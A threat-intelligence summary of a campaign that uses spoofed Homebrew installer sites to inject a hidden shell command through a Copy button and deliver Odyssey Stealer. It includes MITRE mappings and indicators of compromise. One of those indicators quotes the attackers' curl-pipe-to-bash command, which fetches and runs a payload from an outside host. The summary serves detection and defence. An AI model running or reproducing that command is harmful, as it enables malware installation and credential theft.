Attackers created multiple spoofed Homebrew installer sites that copied brew.sh but forced users to use a page Copy button which injects a hidden malicious shell command into the clipboard, leading to parallel download and execution of payloads like Odyssey Stealer. Kandji observed the infrastructure, Russian-language code comments suggesting payload-as-a-service and exfiltration to Telegram, and listed domains and a malicious curl command used in the campaign. #OdysseyStealer #HomebrewOnline
Keypoints
- Researchers found multiple spoofed Homebrew domains (e.g., homebrewoneline[.]org) resolving to the same hosting IP 38[.]146[.]27[.]144 that served carbon-copy Homebrew pages.
- The fake pages prevented text selection and forced use of a Copy button that wrote an attacker-controlled command to the clipboard, enabling silent injection of malicious commands when users pasted the installer.
- Embedded JavaScript logged click events via notify.php and contained Russian comments indicating where to insert malicious commands and suggesting exfiltration endpoints such as Telegram, implying a commodity “malware-as-a-service” model.
- Observed infrastructure downloaded Odyssey Stealer in at least one instance, showing the campaign delivered real credential-stealing payloads rather than being a single-use scam.
- Campaign artifacts and a published malicious command (base64-encoded curl payload) demonstrate active weaponization and rapid updates to inject working payloads before takedown.
- Homebrew and other package managers are high-value targets because developer machines concentrate credentials and build artifacts; compromising installers can lead to broad access within organizations.
- Kandji published example IOCs and referenced a community-maintained domain repo to aid detection and blocking, and recommends verifying install sources and commands before running one-liners.
MITRE Techniques
- [T1204] User Execution – The spoofed pages coerced users into copying and executing a hidden install command via a Copy button, described as “the page forces them to use a single Copy button…inject an extra hidden command into the clipboard.”
- [T1059] Command and Scripting Interpreter – Attackers injected shell commands (curl | bash style) into the clipboard to run shell interpreters and download payloads: “the malicious, base64-encoded cURL payload.”‘
- [T1071] Application Layer Protocol – The page used HTTP(s) to fetch payloads and to POST click metadata to notify.php (logging click time and metadata), quoted as “the script issues a POST request…sending a JSON payload to notify.php that logs the click time and other metadata back to the server.”
- [T1566] Phishing – Social-engineering technique mirrors “ClickFix” campaigns that trick victims into pasting attacker-supplied shell commands under a benign pretext: “This technique closely mirrors recent ‘ClickFix’ social-engineering campaigns…victims are coerced into pasting attacker-supplied shell commands.”
- [T1608] Stage Capabilities: Exfiltration – Russian comments suggested exfiltration destinations and use of Telegram for data exfiltration, indicated by “Russian-language comments…even suggest exfiltration destinations (for example, Telegram).”
Indicators of Compromise
- [Domain ] spoofed Homebrew sites used to serve malicious installer pages – homebrewfaq[.]org (active), homebrewonline[.]org, and others (see repo for many more).
- [IP Address ] common hosting/resolution for spoofed domains – 38[.]146[.]27[.]144.
- [Command ] injected installer command used to download and execute payloads – “curl -s http://185[.]93[.]89[.]62/d/vipx69930 | nohup bash &” (example; other commands included base64-encoded cURL payloads).
- [Domain Repo ] community-maintained list of related domains – https://github.com/stamparm/maltrail/blob/master/trails/static/malware/osx_atomic.txt.
Read more: https://the-sequence.com/brewing-trouble-homebrew-spoofed-sites-rise